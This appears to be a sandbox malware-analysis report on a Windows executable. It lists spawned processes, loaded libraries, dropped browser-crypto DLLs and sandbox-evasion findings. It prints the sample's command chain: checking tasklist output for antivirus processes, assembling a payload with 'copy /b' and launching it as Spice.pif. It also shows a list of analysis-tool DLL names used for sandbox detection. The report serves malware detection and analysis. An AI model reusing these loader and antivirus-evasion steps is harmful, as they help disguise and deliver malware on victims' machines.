Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 0dN59ZIkEM.exe	ReversingLabs: Detection: 47%
Source: 0dN59ZIkEM.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

File read: C:\Users\user\Desktop\0dN59ZIkEM.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0dN59ZIkEM.exe "C:\Users\user\Desktop\0dN59ZIkEM.exe"
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0dN59ZIkEM.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.11.dr, nss3.dll.11.dr
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.11.dr, nss3.dll.11.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Unpacked PE file: 11.2.Spice.pif.10000000.2.unpack

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EEC6D9 LoadLibraryA,GetProcAddress,

11_2_00EEC6D9

Source: sqln[1].dll.11.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.11.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.11.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.11.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.11.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.11.dr	Static PE information: section name: .didat
Source: nss3.dll.11.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.11.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.11.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E98B75 push ecx; ret

11_2_00E98B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\nss3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	File created: C:\ProgramData\HCAEGCBFHJDG\vcruntime140.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EF59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_00EF59B3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E85EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_00E85EDA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_00E933B7

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
